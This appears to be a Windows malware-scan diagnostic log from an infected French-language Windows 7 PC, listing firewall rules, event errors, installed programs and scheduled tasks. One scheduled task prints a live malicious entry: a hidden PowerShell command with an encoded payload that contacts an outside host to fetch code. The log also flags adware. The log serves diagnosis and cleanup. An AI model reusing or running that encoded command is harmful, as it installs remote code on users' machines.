FirewallRules: [{1310FE3B-EB60-419E-AE39-E00E326FDFAD}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{A37251FD-5AD9-49E0-928E-CC9BE6B692A1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{69A38952-B20C-4684-AECD-3B9455105EFC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{7AC76DCE-BDFD-48A8-96E3-6AA09F15FA74}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{9E96A28B-C193-4A43-8A30-168531253000}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{053CCA07-28CF-4DE9-99EF-71F174FF0C55}] => (Allow) C:\Program Files\Steam\Steam.exe
FirewallRules: [{2F637BF7-41FC-4692-AD30-2BB729E4DE87}] => (Allow) C:\Program Files\Steam\Steam.exe
FirewallRules: [{9722AFEA-44AF-4722-AA58-B9D0D5CF908C}] => (Allow) C:\Program Files\Steam\bin\steamwebhelper.exe
FirewallRules: [{61D109FF-C4F5-4FA5-B892-7703DEEC623A}] => (Allow) C:\Program Files\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{1C6CF19B-F1BF-4B4A-BAE8-70836A900EA8}C:\programdata\battle.net\agent\agent.3526\agent.exe] => (Allow) C:\programdata\battle.net\agent\agent.3526\agent.exe
FirewallRules: [UDP Query User{4EB78251-8AAA-4C99-A9FE-16902C36F078}C:\programdata\battle.net\agent\agent.3526\agent.exe] => (Allow) C:\programdata\battle.net\agent\agent.3526\agent.exe
FirewallRules: [{7551BD7B-4F98-4DD6-B382-F2FAB2E4EC5F}] => (Allow) C:\Windows\System32\taskhost.exe
FirewallRules: [{03D8AB22-43C2-4882-A5C1-45A28B13DE06}] => (Allow) C:\Windows\System32\taskhost.exe
FirewallRules: [{43CCB6C1-C8BB-4D9A-8D1A-CA4B07F04934}] => (Allow) C:\Windows\explorer.exe
FirewallRules: [{9C1539AC-F7DF-4B05-939B-05A3F78633A9}] => (Allow) C:\Windows\explorer.exe
FirewallRules: [TCP Query User{19AFC1D8-F3CE-428F-92C4-1E986E8C2362}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [UDP Query User{FCF99FDC-3F71-4703-949D-F98F2750D1A7}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [{097C319C-B5FA-4287-8E1D-28CA605F48E6}] => (Allow) C:\Program Files\Steam\SteamApps\common\Confrontation\Confrontation.exe
FirewallRules: [{0AB625DE-2C91-4DE9-AB4F-752FAF30AD62}] => (Allow) C:\Program Files\Steam\SteamApps\common\Confrontation\Confrontation.exe
FirewallRules: [TCP Query User{B41FD610-5A3E-4743-A9AD-A6C0A9E05743}C:\users\mario\appdata\local\temp\low\2a9e.tmp] => (Block) C:\users\mario\appdata\local\temp\low\2a9e.tmp
FirewallRules: [UDP Query User{85971E97-704A-4275-9432-C2F099E038B9}C:\users\mario\appdata\local\temp\low\2a9e.tmp] => (Block) C:\users\mario\appdata\local\temp\low\2a9e.tmp
FirewallRules: [TCP Query User{5AC2025E-DE35-414A-9878-BCAED5533786}C:\windows\system32\rundll32.exe] => (Block) C:\windows\system32\rundll32.exe
FirewallRules: [UDP Query User{2122EE27-82B5-44BF-A1E5-3C5422BE74B0}C:\windows\system32\rundll32.exe] => (Block) C:\windows\system32\rundll32.exe
FirewallRules: [TCP Query User{03C4591D-12E8-4C2E-A44E-D39D04F6F801}C:\windows\system32\rundll32.exe] => (Block) C:\windows\system32\rundll32.exe
FirewallRules: [UDP Query User{D0A17B1B-95B3-4A2E-9342-0279D089C250}C:\windows\system32\rundll32.exe] => (Block) C:\windows\system32\rundll32.exe
FirewallRules: [{920ACAB2-75EF-4BE4-84B5-4DE52A0761CC}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe
FirewallRules: [{C7E2C546-9571-42B3-8539-B61A3FD14375}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{354A79C5-88D6-4C69-A13E-14F0E1594A3A}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{8399214B-0C43-4E6D-9583-181B2212D2DF}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{A2904C05-75C9-480D-BE9B-E66E48EAAFB7}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{38C0AF95-5237-4242-BD52-74ABF054889D}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{95668487-423A-4B0B-814F-16D10EE0566F}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [TCP Query User{1B5D6071-AA90-4BE5-9898-9FBE3FC52AD3}C:\users\mario\appdata\roaming\bittorrent\updates\7.9.5_41074.exe] => (Block) C:\users\mario\appdata\roaming\bittorrent\updates\7.9.5_41074.exe
FirewallRules: [UDP Query User{1B244DA5-5BAD-4156-8420-CD474F34AD25}C:\users\mario\appdata\roaming\bittorrent\updates\7.9.5_41074.exe] => (Block) C:\users\mario\appdata\roaming\bittorrent\updates\7.9.5_41074.exe
FirewallRules: [{63291B65-BDA5-4742-A601-2C2BBDCA9374}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{48003FEB-EFE9-4776-AE05-E9626743FFF4}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{83B9B4AC-9C6E-4401-A878-39DCEC14ACF0}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{5E834285-FDFF-47F7-A556-0E24C6E68296}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{40D42DA9-DD78-4CD8-BBA7-120196D56930}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3.exe
FirewallRules: [{AB3269C0-5B3B-47CD-9D56-C8CF295B5FD1}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3.exe
FirewallRules: [{1561505E-5D2F-4C2A-8168-FAA613EC3B56}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3x.exe
FirewallRules: [{1F08F2B5-7410-406E-8223-03A8AF1CC19C}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3x.exe
FirewallRules: [{84A185F4-C868-4F55-AD52-75CF14AB34AF}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3y.exe
FirewallRules: [{5D91920B-C0FD-4886-BF3A-4061368EF1D4}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3y.exe
FirewallRules: [{0A380072-65C3-4749-9378-FE053661DCFC}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcher.exe
FirewallRules: [{E0B43DB0-7E93-4444-9358-5EBB0E5B591E}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcher.exe
FirewallRules: [{055ED01D-1D94-4116-9612-1D843A77445A}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcher2.exe
FirewallRules: [{ABEB7EB9-C9DC-4C9B-A47F-981DDCE6B42E}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcher2.exe
FirewallRules: [{2F95B77E-B5CB-499B-B0A5-F65090B072FB}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcherx.exe
FirewallRules: [{B4FEB05D-3880-4F13-8C09-C70B401C19D2}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcherx.exe
FirewallRules: [{E14F6955-BAA4-4E1C-9322-22C756C81CCC}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatchery.exe
FirewallRules: [{B4D9C81F-D641-47A0-8416-579ED1B05A0E}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatchery.exe
==================== Restore Points =========================
06-02-2016 23:48:09 Scheduled Checkpoint
10-02-2016 16:24:49 DirectX est installé
19-02-2016 13:15:35 Device Driver Package Install: Avast Network Service
19-02-2016 13:27:30 Device Driver Package Install: Avast Network Service
==================== Faulty Device Manager Devices =============
Name: Port série PCI
Description: Port série PCI
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Microsoft Teredo Tunneling Adapter
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Name: Contrôleur PCI de communications simplifiées
Description: Contrôleur PCI de communications simplifiées
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
==================== Event log errors: =========================
Application errors:
==================
Error: (02/19/2016 01:12:34 PM) (Source: System Restore) (EventID: 8210) (User: )
Description: Une erreur non spécifiée s’est produite au cours de la restauration du système : (Scheduled Checkpoint). Informations supplémentaires : 0xc0000022.
Error: (02/19/2016 12:48:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x8e4
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:48:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x9a8
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:46:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0xec4
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:45:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x820
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:45:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x854
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:44:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0xd4c
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:37:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x65929617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x177c
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:37:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x65929617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x158c
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:36:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x65929617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x1074
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
System errors:
=============
Error: (02/19/2016 01:33:19 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Service Google Update (gupdate) n’a pas pu démarrer en raison de l’erreur :
%%2
Error: (02/19/2016 01:31:24 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Le Gestionnaire de services de contrôle a essayé d’entreprendre une action corrective (Restart the service) après la fin inattendue du service Avast Firewall, mais cette action a échoué en raison de l’erreur suivante :
%%1056
Error: (02/19/2016 01:31:19 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Le pilote de démarrage système ou d’amorçage suivant n’a pas pu se charger :
aswNetSec
Error: (02/19/2016 01:31:19 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Avast Firewall s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 5000 millisecondes : Restart the service.
Error: (02/19/2016 01:31:06 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Le service Function Discovery Resource Publication s’est arrêté avec l’erreur :
%%-2147024891
Error: (02/19/2016 01:31:06 PM) (Source: HTTP) (EventID: 15005) (User: )
Description: \Device\Http\ReqQueue[::]:5357
Error: (02/19/2016 01:31:01 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Le service IKE and AuthIP IPsec Keying Modules s’est arrêté avec l’erreur :
%%13876
Error: (02/19/2016 01:30:47 PM) (Source: NetBT) (EventID: 4307) (User: )
Description: L’initialisation a échoué car le transport a refusé d’ouvrir les adresses initiales.
Error: (02/19/2016 01:30:47 PM) (Source: NetBT) (EventID: 4307) (User: )
Description: L’initialisation a échoué car le transport a refusé d’ouvrir les adresses initiales.
Error: (02/19/2016 01:22:18 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Service Google Update (gupdate) n’a pas pu démarrer en raison de l’erreur :
%%2
==================== Memory info ===========================
Processor: Intel(R) Core(TM)2 CPU 6420 @ 2.13GHz
Percentage of memory in use: 90%
Total physical RAM: 2029.64 MB
Available physical RAM: 201.83 MB
Total Virtual: 4059.29 MB
Available Virtual: 1319.32 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:465.75 GB) (Free:233.04 GB) NTFS ==>[drive with boot components (obtained from BCD)]
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: F6DAF6DA)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)
==================== End of Addition.txt ============================
Ran by Mario (2016-02-19 13:40:06)
Running from C:\Users\Mario\Downloads
Microsoft Windows 7 Édition Intégrale (X86) (2014-05-02 16:35:45)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2531867340-1831226124-3850839779-500 - Administrator - Disabled)
Guest (S-1-5-21-2531867340-1831226124-3850839779-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2531867340-1831226124-3850839779-1002 - Limited - Enabled)
Mario (S-1-5-21-2531867340-1831226124-3850839779-1000 - Administrator - Enabled) => C:\Users\Mario
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: avast! Antivirus (Disabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Disabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: avast! Antivirus (Disabled) {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 19 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 19.0.0.245 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.11) - Français (HKLM\...\{AC76BA86-7AD7-1036-7B44-AB0000000001}) (Version: 11.0.11 - Adobe Systems Incorporated)
Age of Empires III: Complete Collection (HKLM\...\GFWL_{4541091F-1F3D-4BA3-A5A3-F71000000100}) (Version: 1.0.0000.1 - Microsoft Game Studios)
Age of Empires III: Complete Collection (Version: 1.0.0000.1 - Microsoft Game Studios) Hidden
Avast Internet Security (HKLM\...\Avast) (Version: 11.1.2253 - AVAST Software)
Battle.net (HKLM\...\Battle.net) (Version: - Blizzard Entertainment)
BitTorrent (HKU\S-1-5-21-2531867340-1831226124-3850839779-1000\...\BitTorrent) (Version: 7.9.4.40912 - BitTorrent Inc.)
Confrontation (HKLM\...\Steam App 204560) (Version: - Cyanide)
Diablo III (HKLM\...\Diablo III) (Version: - Blizzard Entertainment)
DNS Unlocker version 1.4 (HKLM\...\{E1527582-8509-4011-B922-29E3FB548882}_is1) (Version: 1.4 - www.dnsunlocker.com) <==== ATTENTION
Google Chrome (HKLM\...\Google Chrome) (Version: 44.0.2403.157 - Google Inc.)
Google Update Helper (Version: 1.3.21.153 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.28.1 - Google Inc.) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30411 (HKLM\...\{5DA8F6CD-C70E-39D8-8430-3D9808D6BD17}) (Version: 9.0.30411 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Mises à jour NVIDIA 11.10.13 (Version: 11.10.13 - NVIDIA Corporation) Hidden
Module linguistique Microsoft .NET Framework 4 Client Profile FRA (HKLM\...\Microsoft .NET Framework 4 Client Profile FRA Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Module linguistique Microsoft .NET Framework 4 Extended FRA (HKLM\...\Microsoft .NET Framework 4 Extended FRA Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
NVIDIA Logiciel système PhysX 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
NVIDIA Pilote 3D Vision 335.23 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 335.23 - NVIDIA Corporation)
NVIDIA Pilote du contrôleur 3D Vision 335.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 335.21 - NVIDIA Corporation)
NVIDIA Pilote graphique 335.23 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 335.23 - NVIDIA Corporation)
NVIDIA Virtual Audio 1.2.20 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.20 - NVIDIA Corporation)
Panneau de configuration NVIDIA 335.23 (Version: 335.23 - NVIDIA Corporation) Hidden
PlayLinc (HKLM\...\{2158685C-E2B3-4026-B0A1-0FFE31837AFD}) (Version: 2.0.2 - SCI)
SafeZone Stable 1.46.1990.139 (Version: 1.46.1990.139 - Avast Software) Hidden
SafeZone Stable 1.48.2066.44 (Version: 1.48.2066.44 - Avast Software) Hidden
Steam (HKLM\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve)
TeamViewer 10 (HKLM\...\TeamViewer) (Version: 10.0.47484 - TeamViewer)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2531867340-1831226124-3850839779-1000_Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\localserver32 -> C:\Users\Mario\AppData\Local\Temp\6082966088374474724e.exe => No File
CustomCLSID: HKU\S-1-5-21-2531867340-1831226124-3850839779-1000_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\Users\Mario\AppData\Local\Extption\wmiTraceCtr.dll => No File
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {1235A3FB-EB03-4829-BE68-25DAD15F91AF} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-02-19] (AVAST Software)
Task: {2EF40B68-9440-4002-98FF-02F0650DB920} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-02-19] (AVAST Software)
Task: {421EF3F0-5E18-4908-B292-D94728B2AD69} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)
Task: {4CA678C4-4D2F-469A-B625-028527E444CE} - System32\Tasks\{4E33E97D-A58F-FC31-A121-05817E767897} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGIAbwBvAHQAZgB1AG4ALgBpAG4AZgBvAC8AdQAvAD8AcQA9ADMAcgBOAEcAcgB5AGEATABHAE4ALQA5AGoAXwBjAEUAaQByAHkAYgA4AGcAUABHAHcATQBXAGUANgB2AEgAZABpAFAAbABWADIARwB6AGMAawBnAGUASQBYAHkAMQBXAGkAXwAxAFIAUQBWAGsAZABGADQASABfAE8AYgA3AEIAYwB4AE0AWQBiAEcAcgBQAFcAWAByAFcAWQBBADIAYgBfAEwATwA5AE8ATwA5AHYASgBRAFoAUwB5ADEAawBzAG4AVgBzAGEAbwByAEgAMwBIAHkAMABFAG0AMgA4AGUAOABEAGUAOABpAHYANQB2ADIAUwB3AEQAOQBRAGsAdAA5ADgAbAAtAHoAcABOAHYASAB4AEsAVQBXAFUAWAAxAE0AWgBDAGYAdwBXADUAWABLAHIAdgBQADQAcABUAE8AWABGAFEANwA2AHQAcABhADUAMgA4AGcAbgBBAGcAUQBRAF8AMwBDAHkAMgBYAFIAOQBiAEUARwBKAHEAbQA2AEwAegB2AEwAMQAyAFYARAA0ADUAagBWADQAMQBuAEsAMABaADAANwBjAG0ALQBrADcARwBDAEsAcgBQAHYAZQA5ADcAWQB5AGEAegBDAEUAUQBYAHoANABJAHkAQgBDAEQAVAA0AFQAWABYAGsAeAB3AGoAVAA5ADQATwBuAHoAVgBkAG8AaABsAEgAeABPAEkASQAxAFUAWQB4AGkANABLAFMAbwBUAHMATQBSAF8AdgAxAHEATwBoADgAWQBuAHMAawBKAHoAQgBWAGYAdwBxAFAANgBDADYAcABMAHYAbAB2AF8ANgBsADMAZAByAGcAQgBaAEwAXwA0AC0AawBuAFoASwBzAEIANAByAEwAOABGAGQAVQBEAEcAcwBHAEoAOQBWAEUATQBSAHcAOQBFAEoAQQBMAHcAbQBIAGgARgAyADYAdAAtADYAaABGAEgAQwB5AEwAWgBKAEwAcQBPAEoAeAB1AFcATgB2AFQAeQBtAFMAYgBvAHMAMgBMAHcAMQBYAFMANABTAGQASgB5AHYAdABVAEQAZwBnADMAegBLAEkARABZAF8ANwBJADgAYwAtAE4ARQBUAHIAOAB4AGMASwBFAHYAagBCAG8ANQBhAGIAWgAtAGgAcQB3AHoARgBaAFgASwBCAE0AeABlAE0ATQAzAGUAeQBLAEIAegBDAHMANQA3AGgATgBaADIAagBnAHkAaABXADcAeQBXAG4ALQBrAEEAQgBWACYAYwA9AHIATgB1AG4AdABOAE4AMgBWAGQAdQBLAGgAeABUAE0AeAA1AG4AeQBhAG0AMgBDAGgAcwBpAGgAOABjAGcAXwBPAHkATQBoAG4AVgBIAHIAbQBtADUASQBRADQANgBJAHUAMwBHAFoAbQAzAHMAVAA3AE0AOAAzAEsAVwBxAEEAVgBKAHMAdQBwAHMAbQBfAGYAOQBiAGkAbABRAGsAMgBxAFkAZgBWAFgAOQBFAGgAagAyAE8AagBUAHEAbgB0AGoAdwA4AHAAMQAzAE8AcwBNAHcAOQA3AFUAVABxAEMARwA3AG8AUwAwADQAMgA2AE8AOABLAFoASgB6AEYAYQBJAFUANg